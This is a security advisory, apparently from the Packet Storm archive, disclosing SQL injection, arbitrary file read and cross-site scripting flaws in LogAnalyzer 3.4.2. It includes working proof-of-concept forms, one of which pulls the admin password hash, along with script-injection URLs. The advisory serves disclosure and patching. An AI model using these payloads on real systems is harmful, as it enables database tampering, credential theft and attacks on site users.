exploit the possibilities
Home Files News &[SERVICES_TAB]About Contact Add New

LogAnalyzer 3.4.2 Cross Site Scripting / SQL Injection / File Read

LogAnalyzer 3.4.2 Cross Site Scripting / SQL Injection / File Read
Posted May 25, 2012
Authored by Filippo Cavallarin

LogAnalyzer version 3.4.2 suffers from cross site scripting, arbitrary file reading, and remote SQL injection vulnerabilities.

tags | exploit, remote, arbitrary, vulnerability, xss, sql injection
SHA-256 | 20e0cd6da8ae12e950d981ee3947ff25853bdc8fedef7053293f570dfee099d1

LogAnalyzer 3.4.2 Cross Site Scripting / SQL Injection / File Read

Change Mirror Download
Advisory ID:  CSA-12005
Title: Multiple vulnerabilities in LogAnalyzer
Product: LogAnalyzer
Version: 3.4.2 and probably prior
Vendor: adiscon.com
Vulnerability type: SQL injection, XSS, Arbitrary File Read
Risk level: 2 / 3
Credit: www.codseq.it
CVE:
Vendor notification: 2012-05-21
Public disclosure: 2012-05-23


Details

LogAnalyzer version 3.4.2 and probably below suffers from multiple vulnerabilities:

- SQL Injection

1) The script admin/views.php contains a SQL-Injection vulnerability when used to create a new view. It can be exploited by a non-admin user (with write access) to insert arbitrary data into logcon_views table.
The vulnerability exists due to the failure in the script to sanytize the POST variable "Columns" before use it to build a SQL query.

This PoC creates an arbitrary record into logcon_views table.


<form method=post action="http://127.0.0.1/loganalyzer-3.4.2/admin/views.php">
<input name="DisplayName" value="dontcare">
<input name="isuseronly" value="2">
<input name="Columns[]" value="',2,null) ,('arbitrary','',1,2), ('dontcare2','">
<input name="op" value="addnewview">
<input type=submit value="go!">
</form>




2) The script admin/views.php contains a SQL-Injection vulnerability when used to update a view. It can be exploited by a non-admin user (with write access) to obtain arbitrary database data.
The vulnerability exists due to the failure in the script to sanytize the POST variable "Columns" before use it to build a SQL query.

This PoC updates a view and sets the admin password (md5) as the view name


<form method=post action="http://127.0.0.1/loganalyzer-3.4.2/admin/views.php">
<input name="DisplayName" value="dontcare">
<input name="isuseronly" value="2">
<input name="Columns[]" value="',DisplayName=(select password from logcon_users where username='admin'),Columns='">
<input name="op" value="editview">
<input name="id" value="1">
<input type=submit value="go!">
</form>






- Arbitrary File Read

LogAnalyzer allows non-admin users (with write access) to create a diskfile source with an arbitrary value as "syslog file" parameter. By setting this parameter to "config.php", the configuration file is disclosed when the source is loaded.







- Cross Site Scripting


1) The input passed via the "filter" parameter to index.php is not properly sanitised before being returned to the user.
http://127.0.0.1/loganalyzer-3.4.2/index.php?filter=%3C/title%3E%3Cscript%3Ealert(1)%3C/script%3E


2) The input passed via the "id" parameter to admin/reports.php is not properly sanitised before being returned to the user.
http://127.0.0.1/loganalyzer-3.4.2/admin/reports.php?op=details&id=eventsummary%3Cscript%3Ealert(1)%3C/script%3E


3) The input passed via the "id" parameter to admin/searches.php is not properly sanitised before being returned to the user.
http://127.0.0.1/loganalyzer-3.4.2/admin/searches.php?op=edit&id=7%3Cscript%3Ealert(1)%3C/script%3E




Solution

upgrade to LogAnalyzer 3.4.3






Filippo Cavallarin


C o d S e q
Development with an eye on security
------------------------------------------------------------------------
Castello 2005, 30122 Venezia
Tel: 041 88 761 58 - Fax: 041 81 064 714 - Cell: 346 66 93 254
c.f. CVLFPP82B27L736J - p.iva 03737650279
http://www.codseq.it - filippo.cavallarin@codseq.it
Login or Register to add favorites

File Archive:

January 2023

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Jan 1st
    0 Files
  • 2
    Jan 2nd
    13 Files
  • 3
    Jan 3rd
    5 Files
  • 4
    Jan 4th
    5 Files
  • 5
    Jan 5th
    9 Files
  • 6
    Jan 6th
    5 Files
  • 7
    Jan 7th
    0 Files
  • 8
    Jan 8th
    0 Files
  • 9
    Jan 9th
    18 Files
  • 10
    Jan 10th
    31 Files
  • 11
    Jan 11th
    30 Files
  • 12
    Jan 12th
    33 Files
  • 13
    Jan 13th
    25 Files
  • 14
    Jan 14th
    0 Files
  • 15
    Jan 15th
    0 Files
  • 16
    Jan 16th
    7 Files
  • 17
    Jan 17th
    25 Files
  • 18
    Jan 18th
    38 Files
  • 19
    Jan 19th
    6 Files
  • 20
    Jan 20th
    21 Files
  • 21
    Jan 21st
    0 Files
  • 22
    Jan 22nd
    0 Files
  • 23
    Jan 23rd
    24 Files
  • 24
    Jan 24th
    68 Files
  • 25
    Jan 25th
    22 Files
  • 26
    Jan 26th
    20 Files
  • 27
    Jan 27th
    17 Files
  • 28
    Jan 28th
    0 Files
  • 29
    Jan 29th
    0 Files
  • 30
    Jan 30th
    0 Files
  • 31
    Jan 31st
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2022 Packet Storm. All rights reserved.

Hosting By
Rokasec
close